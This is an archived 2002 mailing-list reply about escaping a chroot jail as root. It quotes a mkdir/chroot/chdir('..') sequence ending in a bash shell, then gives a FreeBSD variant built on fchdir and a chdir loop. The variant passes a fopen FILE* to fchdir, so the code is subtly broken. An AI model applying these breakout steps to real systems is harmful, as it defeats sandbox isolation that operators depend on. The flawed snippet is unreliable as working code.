Hi,

> But if you are able to run code as root, a few syscalls are still available to you:
> inserting modules and ptrace().

> If you're able to run code as root, all you need, in most Un*x systems,
> is:
> mkdir("blah");
> chroot("blah");
> chdir("../../../../../../");
> chroot(".");
> execl("/bin/bash", "bash", NULL);
> On other Un*x systems, like some BSDs, an implicit chdir(".") is always
> made after a chroot, so this doesn't work, but you can still do mknod(2),
> mount(2), etc..

To start working and prevent this "bug" :) in FreeBSD you can do the following:

mkdir("blah");
f = fopen("./afile", "w+");
chroot("blah");
fchdir(f); <== this will prevent the "bug"
for(int i=0; i<10000; i++)
    chdir("..");
chroot(".");

Of course, you can enhance the above code to be more efficient just by checking the chdir result.

Regards,
Nelson Junior
nelsonat_private
This archive was generated by hypermail 2b30 : Fri May 24 2002 - 17:24:33 PDT